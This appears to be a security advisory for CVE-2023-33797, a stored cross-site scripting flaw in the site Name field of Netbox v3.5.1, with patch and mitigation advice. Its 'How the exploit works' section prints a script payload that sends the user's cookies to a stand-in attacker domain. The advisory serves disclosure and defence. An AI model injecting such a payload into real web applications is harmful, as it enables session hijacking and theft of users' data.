A stored cross-site scripting (XSS) vulnerability has been identified in the Create Sites (/dcim/sites/) function of Netbox v3.5.1. This vulnerability allows attackers to execute arbitrary web scripts or HTML by injecting a crafted payload into the Name field. This vulnerability has been assigned the CVE identifier CVE-2023-33797.
Netbox is a popular open-source tool for managing IP address spaces, data center infrastructure, and networks. The Create Sites function in v3.5.1 allows administrators to create and manage various sites for their infrastructure. Unfortunately, this function is susceptible to a stored XSS vulnerability, which can be exploited by attackers to manipulate the web interface and potentially gain unauthorized access to sensitive information and features.
How the exploit works
One example of a potentially malicious payload is as follows
<script> var xhr = new XMLHttpRequest(); xhr.open('GET', 'https://attacker-domain.com/steal?cookie='; + encodeURIComponent(document.cookie)); xhr.send(); </script>
When this snippet is injected into the Name field, it attempts to send the user's cookies, including their session cookie, to the attacker's domain. If successful, this could allow an attacker to hijack the user's session and perform unauthorized actions in the Netbox interface.
This vulnerability has been reported on the Netbox GitHub repository
Mitigation and solution
The developers of Netbox have been notified of this vulnerability, and a patch has been released in version 3.5.2 to address the issue. It is strongly recommended that users update to the latest version of Netbox immediately to mitigate this vulnerability. If updating is not possible, users should refrain from utilizing the Create Sites function or restrict access to trusted users only.
Further recommendations include implementing proper input validation and sanitization for the Name field to prevent the injection of malicious code. Additionally, administrators should train users to recognize potential XSS vulnerabilities and avoid clicking on untrusted links or downloading suspicious files.
The CVE-2023-33797 vulnerability is a serious issue that can lead to unauthorized access and potential data breaches in the Netbox platform. It is crucial for administrators to update their systems and implement security best practices to mitigate this stored XSS vulnerability. By staying informed about emerging security threats and implementing proactive measures, organizations can better protect their IT infrastructure and sensitive data.
Published on: 05/24/2023 20:15:00 UTC
Last modified on: 05/27/2023 03:41:00 UTC